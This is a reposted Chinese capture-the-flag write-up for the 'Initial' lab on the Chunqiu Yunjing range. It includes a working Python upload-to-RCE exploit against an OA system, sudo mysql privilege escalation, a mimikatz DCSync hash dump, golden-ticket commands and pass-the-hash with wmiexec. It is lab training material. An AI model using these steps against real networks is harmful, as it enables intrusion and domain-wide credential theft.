文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

春秋云镜靶场Initial-WriteUP 专业徽章手把手教学

2023-09-06 22:56

关注

该靶场只有一个flag,有3部分,位于不同的机子上

flag01

开启靶场给了个ip
39.98.33.x
使用fscan浅扫一下
./fscan -h 39.98.33.x
找到了开放的80端口,指纹识别到是thinkphp5,直接使用工具
在这里插入图片描述在这里插入图片描述目标可以直接rce,写马进去
连入shell,发现是www-data权限
下一步提权
上传linpeas

chmod +x linpeas_linux_amd64./linpeas_linux_amd64

在这里插入图片描述得到结果,很多提权洞,这里使用sudo提权

sodu -lsudo mysql -e '\! id'sudo mysql -e '\! cat /root/flag/flag01.txt'

在这里插入图片描述得到flag01:flag{60b53231-

flag02

之后也没有其他提示,浅扫一下内网
在这里插入图片描述发现存在MS17010和另一个web站点,首先用frp把流量带出来
访问网站http://172.22.1.18/
在这里插入图片描述这个系统有漏洞

import requestssession = requests.session()url_pre = 'http://172.22.1.18/'url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {    'rempass': '0',    'jmpass': 'false',    'device': '1625884034525',    'ltype': '0',    'adminuser': 'YWRtaW4=',    'adminpass': 'YWRtaW4xMjM=',    'yanzm': ''}r = session.post(url1, data=data1)r = session.post(url2, files={'file': open('1.php', 'r+')})filepath = str(r.json()['filepath'])filepath = "/" + filepath.split('.uptemp')[0] + '.php'id = r.json()['id']url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3)r = session.get(url_pre + filepath + "?1=system('dir');")print(r.text)

getshell后,找到flag02
flag{60b53231-2ce3-4813-87d4-
在这里插入图片描述

flag03

发现域
导出域内用户hash

meterpreter > kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv[DC] 'xiaorang.lab' will be the domain[DC] 'DC01.xiaorang.lab' will be the DC server[DC] Exporting domain 'xiaorang.lab'[rpc] Service  : ldap[rpc] AuthnSvc : GSS_NEGOTIATE (9)500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        5141106    Marcus  e07510a4284b3c97c8e7dee970918c5c        5121107    Charles f6a9881cd5ae709abb4ac9ab87f24617        5121000    DC01$   edc506302bf9b040febfb84a1459c0e8        5324801104    XIAORANG-OA01$  673ec2d0ad2f73341c4b3e1fc2fbade5        40961103    XIAORANG-WIN7$  507797b66f76b8b71d20555b0c59f86d        4096

生成黄金票据

kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt

导入黄金票据

kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /pttUser      : administratorDomain    : xiaorang.lab (XIAORANG)SID       : S-1-5-21-314492864-3856862959-4045974917-502User Id   : 500Groups Id : *513 512 520 518 519 ServiceKey: fb812eea13a18b7fcdb8e6d67ddc205b - rc4_hmac_nt      Lifetime  : 2022/10/26 10:58:34 ; 2032/10/23 10:58:34 ; 2032/10/23 10:58:34-> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generatedGolden ticket for 'administrator @ xiaorang.lab' successfully submitted for current session

哈希传递
哈希传递:使用impacket包的wmiexec模块

https://github.com/SecureAuthCorp/impacket/

git clone https://github.com/SecureAuthCorp/impacket/cd impacket  pip install -r requirements.txt pip install impacket cd exexample python3 .\wmiexec.py xiaorang/administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8

拿到1.21这台机子,即可发现flag03

来源地址:https://blog.csdn.net/qq_45234543/article/details/127904572

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯